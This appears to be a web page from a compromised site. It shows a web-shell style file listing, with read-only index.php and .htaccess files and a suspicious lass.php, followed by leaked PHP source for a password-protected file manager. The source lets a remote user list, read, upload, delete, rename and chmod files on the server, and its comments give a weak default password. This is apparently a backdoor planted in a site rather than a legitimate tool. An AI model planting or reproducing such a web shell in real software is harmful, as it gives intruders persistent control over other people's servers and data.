| name file |
size |
edit |
permission |
action |
| .htaccess | 906 KB | January 18 2024 20:05:52 | 0444 |
|
| css | - | February 22 2025 03:07:50 | 0755 |
|
| dashboard | - | February 21 2025 20:05:51 | 0755 |
|
| error_log | 51354 KB | February 27 2025 15:17:58 | 0644 |
|
| favicon.ico | 0 KB | October 18 2021 11:56:12 | 0644 |
|
| frontend | - | February 21 2025 20:05:51 | 0755 |
|
| index.php | 6518 KB | February 21 2025 20:04:34 | 0444 |
|
| index0.php | 1790 KB | October 18 2021 11:56:12 | 0644 |
|
| js | - | February 22 2025 03:23:49 | 0755 |
|
| lass.php | 16962 KB | February 21 2025 20:04:34 | 0644 |
|
| mix-manifest.json | 72 KB | October 18 2021 17:53:08 | 0644 |
|
| storage | - | February 22 2025 03:23:28 | 0755 |
|
| uploads | - | February 22 2025 03:24:05 | 0755 |
|
| web.config | 1211 KB | October 18 2021 11:56:12 | 0644 |
|
$desc,"level"=>$level])); }
/*fileFilter -- Courtesy of Sean Vieira on Stack Overflow*/ function fileFilter($file) { return mb_ereg_replace("([^\w\s\d\-_~,;\[\]\(\).])", '', $file); }
//Establish where we are
$currentDirectory = getcwd();
if(isset($_POST['directory']) && $_POST['directory'] != "") { $currentDirectory .= str_replace("..", "", $_POST['directory']); }
/* AJAX responses begin here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
if(isset($_POST['apiCall']) && isset($_SESSION['loggedIn']) && $_SESSION['loggedIn'] === True) {
/* File list begins here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
if(isset($_POST['ls'])) {
//Get all files in the current directory
$fileList = glob($currentDirectory . "/*");
$fileDetails = [];
//Iterate through that list
for($v = 0; $v < sizeof($fileList); $v++) {
//Name
$fileDetails[$v]["name"] = str_replace($currentDirectory . "/", "", $fileList[$v]);
//Directory?
$fileDetails[$v]["isDir"] = is_dir($fileList[$v]);
//In directory -- DELETEME
//$fileDetails[$v]["currentDir"] = $currentDirectory;
//Get file size
$fileDetails[$v]["fileSize"] = ($fileDetails[$v]["isDir"] ? array("","","0") : human_filesize(filesize($fileList[$v]),2));
//Permissions
$fileDetails[$v]["permissions"] = substr(sprintf("%o",fileperms($fileList[$v])),-3);;
//Modified
$fileDetails[$v]["dateModified"] = filemtime($fileList[$v]);
}
//Sort the array as per the user's filter request
$sort = explode(",",$_POST['sortBy']);
$fileDetails = multi_sort($fileDetails,$key=$sort[0],$sort[1]);
//Echo the file info
die(json_encode($fileDetails));
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** File list ends here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* File previews begin here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
else if(isset($_POST['previewFile'])) {
$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
if(file_exists($fileName)) {
die(json_encode(htmlspecialchars(file_get_contents($fileName))));
} else { returnStatus("Couldn't find file.","fatal"); }
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** File previews ends here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* Create file or directory begins here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
else if(isset($_POST['makeFile'])) {
$file = $_POST['fileName'];
$destination = $currentDirectory . "/" . fileFilter($_POST['fileName']);
if(!file_exists($destination)) {
if($_POST['fod'] == "file") {
if($f = @fopen($destination, "w")) {
chmod($destination,0775);
returnStatus("Successfuly created file '" . $file . "'.","success");
} else { returnStatus("Couldn't open stream. Permission denied?","fatal"); }
} else if($_POST['fod'] == "dir") {
if($f = @mkdir($destination,0775,true)) {
returnStatus("Successfuly created directory '" . $file . "'.","success");
} else { returnStatus("Failed to create directory. Permission denied?","fatal"); }
}
} else { returnStatus("File already exists.","fatal"); }
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** Create file or directory ends here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* Delete file or directory begins here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
else if(isset($_POST['deleteFile'])) {
$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
if(file_exists($fileName)) {
if(!is_dir($fileName)) {
if(unlink($fileName)) {
returnStatus("Deleted " . $fileName . ".","success");
} else { returnStatus("Couldn't delete " . $fileName . ".","fatal"); }
} else {
if(recursive_delete($fileName)) {
returnStatus("Deleted " . $fileName . ".","success");
} else { returnStatus("Couldn't delete " . $fileName . ".","fatal"); }
}
} else {
returnStatus("Couldn't find file '" . $fileName . "'.","fatal");
}
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** Delete file or directory ends here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* Copy file or directory begins here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
else if(isset($_POST['copy'])) {
$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
$copyName = $currentDirectory . "/" . fileFilter($_POST['copyName']);
if(file_exists($fileName)) {
if(!file_exists($copyName)) {
if(!is_dir($fileName)) {
if(copy($fileName, $copyName)) {
returnStatus("Successfuly copied file.","success");
} else { returnStatus("Copy failed.","fatal"); }
}
else {
if(recursive_copy($fileName,$copyName)) { returnStatus("Successfuly copied folder.","success"); }
else { returnStatus("Failed to copy folder.","fatal"); }
}
} else { returnStatus($_POST['copyName'] . " already exists.","fatal"); }
}
else {
returnStatus("Couldn't find file '" . explode("/",$fileName)[substr_count($fileName,"/")] . "'.","fatal");
}
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** Copy file or directory ends here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Move file or directory begins here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
else if(isset($_POST['move'])) {
$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
$newFile = $currentDirectory . "/" . str_replace("..", "", $_POST['newDir']) . "/" . fileFilter($_POST['fileName']);
//TODO: Make this better.
if(file_exists($fileName)) {
if(!file_exists($newFile)) {
//Supress error here so we can show our own.
if(@rename($fileName,$newFile)) { returnStatus("Moved file.","success"); }
else { returnStatus("Couldn't move file. Do you have permissions?","fatal"); }
} else { returnStatus($_POST['fileName'] . " already exists.","fatal"); }
}
else {
returnStatus("Couldn't find file '" . explode("/",$fileName)[substr_count($fileName,"/")] . "'.","fatal");
}
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** Move file or directory ends here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* Rename file or directory begins here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
else if(isset($_POST['rename'])) {
$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
$copyName = $currentDirectory . "/" . fileFilter($_POST['copyName']);
if(file_exists($fileName)) {
if(!file_exists($copyName)) {
if(rename($fileName,$copyName)) { returnStatus("Successfuly renamed file.","success"); }
} else { returnStatus($_POST['copyName'] . " already exists.","fatal"); }
}
else { returnStatus("Couldn't find file '" . explode("/",$fileName)[substr_count($fileName,"/")] . "'.","fatal"); }
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** Rename file or directory ends here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* Permission changes begins here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
else if(isset($_POST['changePermissions'])) {
$fileName = $currentDirectory . "/" . fileFilter($_POST['fileName']);
$newPermissions = $_POST['newPermissions'];
$npl = strlen($newPermissions);
//CHMOD numbers must be octals in PHP
if($npl == 3) { $newPermissions = "0" . $newPermissions; $npl++; }
if($npl == 4) {
if(file_exists($fileName)) {
if(chmod($fileName,octdec($newPermissions))) {
returnStatus("Successfuly changed permissions of $fileName to $newPermissions.","success");
} else { returnStatus("Permission change failed.","fatal"); }
} else { returnStatus("Couldn't find file '" . explode("/",$fileName)[substr_count($fileName,"/")] . "'.","fatal"); }
} else { returnStatus("Permission value was not correctly formatted.","fatal"); }
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** Permission changes ends here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* File upload begins here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
else if(isset($_POST['fileUpload'])) {
$finalName = $currentDirectory . "/" . fileFilter(basename($_FILES["fileToUpload"]["name"]));
if(!file_exists($finalName)) {
if(move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $finalName)) {
chmod($finalName,0755);
returnStatus("Uploaded file.","success");
} else { returnStatus("Couldn't upload file.","fatal"); }
} else { returnStatus("File already exists.","fatal"); }
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** File upload ends here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
//If an apiCall is specified but we reach here, no command was actually specified.
die(returnStatus("No command was issued.","fatal"));
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** AJAX responses ends here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* Login form begins here ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ **
** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
//THIS IS NOT VERY SECURE! USE AT YOUR OWN RISK!
// *** Generate a password with this function and replace $password with the result: ***
/*die(password_hash("your password here",PASSWORD_BCRYPT));*/
//Default password is 'alpine'. CHANGE THIS BEFORE YOU USE THE EDITOR!
$password = '$2y$10$NpfqQZ3/i/ExRTsVyaHIRuE7TtKAchPi2gvz4LRnpiaBtJczy.WM2';
//If we've come here from the form
if(isset($_POST['login'])) {
//Verify password
if(password_verify($_POST['password'],$password)) { $_SESSION['loggedIn'] = true; }
else { echo "Incorrect password."; }
}
//If the session didn't get set above, show the login form.
if(!isset($_SESSION['loggedIn']) || !$_SESSION['loggedIn']) {
die("